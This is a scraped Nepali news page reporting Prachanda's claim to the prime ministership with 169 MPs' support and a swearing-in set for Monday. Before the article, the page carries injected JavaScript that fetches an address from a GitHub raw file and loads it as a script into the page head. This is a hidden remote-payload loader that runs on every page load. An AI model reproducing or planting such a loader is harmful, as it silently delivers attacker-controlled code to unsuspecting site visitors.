;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); बहुमत सहित प्रचण्डको प्रधानमन्त्रीमा दावी पेस, भोली सपथ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • बहुमत सहित प्रचण्डको प्रधानमन्त्रीमा दावी पेस, भोली सपथ
Breaking News

बहुमत सहित प्रचण्डको प्रधानमन्त्रीमा दावी पेस, भोली सपथ

जुनेली न्युज, काठमाडौँ |

नयाँ प्रधानमन्त्रीको शपथग्रहण सोमबार हुने भएको छ । आइतबार माओवादी केन्द्रका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ले राष्ट्रपति विद्यादेवी भण्डारी समक्ष बहुमतसहित प्रधानमन्त्रीमा दावी पेश गरेसँगै सोमबार शपथ ग्रहणको तयारी भएको शीतलनिवास स्रोतले जनाएको छ ।

अध्यक्ष प्रचण्डले संविधानको धारा ७६ को उपधारा २ अनुसार नेकपा एमालेसहित १६९ सांसदको समर्थनमा प्रधानमन्त्रीका लागि राष्ट्रपति समक्ष दावी पेश गरेका हुन् ।

फेसबुक प्रतिक्रियाहरु